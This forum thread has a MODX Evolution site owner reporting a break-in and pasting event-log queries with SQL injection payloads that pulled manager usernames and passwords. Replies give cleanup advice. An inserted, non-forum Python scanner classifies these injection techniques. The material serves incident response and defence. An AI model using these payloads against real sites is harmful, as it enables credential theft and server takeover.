    • 36755
    • 41 Posts
    Today I discovered some new PHP files that were arbitrarily uploaded. At first I thought it was the q2a software I am using, but checking the modx event log plus the manager log, I can see that the attacker came in via MODX Evolution!

    After entering the system he uploaded a file, stats.php (https://github.com/echteinfachtv/q2a-various/blob/master/stats.php), that gave him control over the server:

    MODx Parse Error from event log (how he entered the manager panel):

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = ',(("]]').]' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '') AND 6513=8505 AND ('GsiA'='GsiA' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '') AND 8413=8413 AND ('sRCb'='sRCb' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '') AND (SELECT 2315 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT (CASE WHEN (2315=2315) THEN 1 ELSE 0 END)),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('Knbe'='Knbe' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 2315 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT (CASE WHEN (2315=2315) THEN 1 ELSE 0 END)),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Pdru'='Pdru' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = ''; SELECT SLEEP(5)-- ' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' ORDER BY 5530#' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' ORDER BY 6#' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' ORDER BY 10#' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' ORDER BY 5#' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 4465 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT (CASE WHEN (8002 = 8002) THEN 1 ELSE 0 END)),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Payy'='Payy' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 8664 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xeaz'='xeaz' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 6131 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'FPmo'='FPmo' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 9887 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'XLgX'='XLgX' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 5834 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'AEwg'='AEwg' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 6947 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 1,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kzfw'='kzfw' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 1761 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 1,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'seHf'='seHf' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 4478 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 2,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KLre'='KLre' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 1391 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 2,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PjWz'='PjWz' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 6916 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM db348277_7.modx_manager_users),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YArq'='YArq' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 4628 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(id AS CHAR),0x20)),1,50) FROM db348277_7.modx_manager_users ORDER BY id LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'lZHc'='lZHc' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 7605 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,50) FROM db348277_7.modx_manager_users ORDER BY id LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yDor'='yDor' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 8409 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,50) FROM db348277_7.modx_manager_users ORDER BY id LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZeOE'='ZeOE' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = ''' LIMIT 1;

    SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = ''' LIMIT 1;

    Later on the attacker uploaded more files; you can read about it here:
    http://stackoverflow.com/questions/17945523/our-q2a-forum-got-hacked-by-ccteam-what-are-these-php-files-doing
    http://stackoverflow.com/questions/17946838/has-anybody-heard-about-blackhats-with-kernel-exploits-exploit-enlightenment
    http://question2answer.org/qa/26227/hacked-russians-files-include-plugin-theme-folder-discovered

    Please help, how can I prevent another attack?

    I have no idea which settings the attacker has changed within modx, can I see full details from the event log?

    Thank you! [ed. note: kajus99 last edited this post 10 years, 7 months ago.]
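As an added defender-side example (not from the original post, and not MODX code): a small Python scanner that reads "MODx Parse Error" entries like the ones quoted above, isolates the attacker-controlled literal that was spliced into the hash comparison, and labels the injection technique and the column/table being read. The log entries are abbreviated copies of the ones above plus one constructed benign login.

```python
import re

# Constructed sample: copies of the "MODx Parse Error" entries quoted above,
# with the repeated SELECT prefix factored out, plus one benign login (a
# constructed 32-hex MD5) so the scanner has a negative case.
PREFIX = ("SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,"
          "'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN "
          "`modx_user_attributes` attr ON usr.id = attr.internalKey WHERE "
          "MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = ")
SAMPLE_LOG = [
    PREFIX + "',((\"]]').]' LIMIT 1;",
    PREFIX + "'') AND 8413=8413 AND ('sRCb'='sRCb' LIMIT 1;",
    PREFIX + "''; SELECT SLEEP(5)-- ' LIMIT 1;",
    PREFIX + "'' ORDER BY 10#' LIMIT 1;",
    PREFIX + "'' AND (SELECT 7605 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL("
             "CAST(password AS CHAR),0x20)),1,50) FROM db348277_7.modx_manager_users ORDER BY id "
             "LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS "
             "GROUP BY x)a) AND 'yDor'='yDor' LIMIT 1;",
    PREFIX + "'5f4dcc3b5aa765d61d8327deb882cf99' LIMIT 1;",
]

# The only attacker-controlled piece of this query is the literal compared with
# the MD5 hash, i.e. everything between ")) = " and the trailing " LIMIT 1;".
PAYLOAD_RE = re.compile(r"\)\) = (.*) LIMIT 1;\s*$", re.S)
HEX_MD5_RE = re.compile(r"^'[0-9a-f]{32}'$")
# Table the inner SELECT reads from; the CHARACTER_SETS join is only row padding
# for the duplicate-key (error-based) trick, so it is excluded.
TABLE_RE = re.compile(r"\bFROM ((?!INFORMATION_SCHEMA\.CHARACTER_SETS)\w+\.\w+)")
TECHNIQUES = [
    ("time-based", r"SLEEP\(\s*\d+\s*\)"),
    ("error-based", r"FLOOR\(RAND\(0\)\*2\).*GROUP BY"),
    ("column-count probe", r"\bORDER BY \d+"),
    ("boolean-based", r"\b\d+=\d+\b"),
]

def classify(entry):
    """Return (verdict, techniques, detail) for one event-log SQL line."""
    m = PAYLOAD_RE.search(entry)
    if not m:
        return "unparsed", [], ""
    payload = m.group(1)
    if HEX_MD5_RE.match(payload):      # well-formed hash: a normal login attempt
        return "benign", [], ""
    found = [name for name, rx in TECHNIQUES if re.search(rx, payload, re.I)]
    col = re.search(r"CAST\(([\w()]+) AS CHAR\)", payload)
    tbl = TABLE_RE.search(payload)
    detail = ""
    if col:
        detail = "reads " + col.group(1) + (" from " + tbl.group(1) if tbl else "")
    return "injection", found or ["syntax probe"], detail

def scan(entries):
    """Classify every entry; returns (index, verdict, techniques, detail) for non-benign ones."""
    return [(i, *classify(e)) for i, e in enumerate(entries) if classify(e)[0] != "benign"]
```

Running scan over the full log in the post shows the progression from syntax probes to reading id, password and username out of modx_manager_users, which is why the advice below about changing every password applies.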
      • 42046
      • 436 Posts
      Are you using Evo 1.0.5 as your signature suggests? There were several security flaw updates in 1.0.8 and 1.0.9.

      Those logs look a bit like the hash array exploit that was fixed in 1.0.8.

      https://raw.github.com/modxcms/evolution/v1.0.10/install/changelog.txt
      • And that is why it's important to keep an eye on security reports and updates.

        http://forums.modx.com/board/8/security-notices
          Studying MODX in the desert - http://sottwell.com
          Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
          Join the Slack Community - http://modx.org
          • 44258
          • 33 Posts
          The security of your site was not working properly.
            • 36755
            • 41 Posts
            I updated to the latest. Hope that fixes it!
            • If the intruder uploaded malicious scripts, you'll still be hacked. That's the whole point of getting access.
                Studying MODX in the desert - http://sottwell.com
                Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
                Join the Slack Community - http://modx.org
                • 36755
                • 41 Posts
                I removed all former modx files, and uploaded the new version. Then I checked the current database against the database from a clean backup to see changes. There were none, just the Parser error due to the hack.

                I also checked files that have been uploaded within the time frame from hack to now using Filezilla, and removed the malicious ones.

                What am I missing? Thanks :)
                • Sounds like you did everything.
                    Studying MODX in the desert - http://sottwell.com
                    Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
                    Join the Slack Community - http://modx.org
                    • 11681
                    • 98 Posts
                    Kai, why did it occur to you to look for the site hack in the first place? Did your site exhibit some strange behavior as a side-effect of the hack? Or did you perhaps just happen to see the unfamiliar new PHP while doing some development work?
                      I looked just like that in 1964.
                    • Looks like your passwords may have been mined too: you should change all of them for every user you had on that site and email the users that the passwords may have been compromised so they should change their passwords on any sites that may have used the same passwords. Never reuse a password. We're developing some custom security options for our servers to help prevent hacks like this from ever succeeding -- a good host can help reduce the risk of stuff like this.